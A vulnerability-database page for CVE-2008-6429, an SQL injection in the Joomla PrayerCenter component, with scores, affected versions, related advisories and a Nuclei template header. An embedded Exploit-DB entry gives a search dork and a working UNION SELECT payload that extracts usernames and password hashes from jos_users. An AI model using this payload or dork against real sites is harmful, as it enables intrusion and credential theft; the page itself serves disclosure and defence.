CVE-2008-6429
published 2009-03-06CVE-2008-6429: SQL injection vulnerability in the PrayerCenter (com_prayercenter) component 1.4.9 and earlier for Joomla! allows remote attackers to execute arbitrary SQL…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.39%
68.8th percentile
SQL injection vulnerability in the PrayerCenter (com_prayercenter) component 1.4.9 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a view_request action to index2.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mike_leeper | com_prayercenter | <= 1.4.9 | — |
| mlwebtechnologies | prayercenter | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-475q-q69f-cvx2: SQL injection vulnerability in the PrayerCenter (com_prayercenter) component 1
ghsa_unreviewed·2022-05-17
CVE-2008-6429 [HIGH] CWE-89 GHSA-475q-q69f-cvx2: SQL injection vulnerability in the PrayerCenter (com_prayercenter) component 1
SQL injection vulnerability in the PrayerCenter (com_prayercenter) component 1.4.9 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a view_request action to index2.php.
GHSA
GHSA-7fgr-rxh7-75r8: SQL Injection exists in the PrayerCenter 3
ghsa_unreviewed·2022-05-14·CVSS 7.5
CVE-2018-7314 [HIGH] CWE-89 GHSA-7fgr-rxh7-75r8: SQL Injection exists in the PrayerCenter 3
SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
VulnCheck
mlwebtechnologies prayercenter Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2018·CVSS 7.5
CVE-2018-7314 [HIGH] mlwebtechnologies prayercenter Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
mlwebtechnologies prayercenter Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
Affected: mlwebtechnologies prayercenter
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/
No detection rules found.
Exploit-DB
Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection
exploitdb·2008-05-31
CVE-2008-6429 Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection
Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection
---
/---------------------------------------------------------------\
\ /
/ Joomla Component prayercenter Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:"com_prayercenter"
[*] POC : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL}
[*] Example : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
[*] Note : Sometimes you need to register for doing this exploit
[*] Greetings : Str0ke, all friends & musli
Nuclei
Joomla! Component PrayerCenter 3.0.2 - SQL Injection
nuclei·CVSS 7.5
CVE-2018-7314 [HIGH] Joomla! Component PrayerCenter 3.0.2 - SQL Injection
Joomla! Component PrayerCenter 3.0.2 - SQL Injection
SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
Template:
id: CVE-2018-7314
info:
name: Joomla! Component PrayerCenter 3.0.2 - SQL Injection
author: DhiyaneshDK
severity: critical
description: |
SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
impact: |
Unauthenticated attackers can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire Joomla installation.
remediation: |
Remove the vulnerable PrayerCenter component or upgrade to a patched version.
reference:
- https://www.exploit-db.com
No writeups or analysis indexed.
http://osvdb.org/45856http://secunia.com/advisories/30493https://exchange.xforce.ibmcloud.com/vulnerabilities/42772https://www.exploit-db.com/exploits/5708http://osvdb.org/45856http://secunia.com/advisories/30493https://exchange.xforce.ibmcloud.com/vulnerabilities/42772https://www.exploit-db.com/exploits/5708
2009-03-06
Published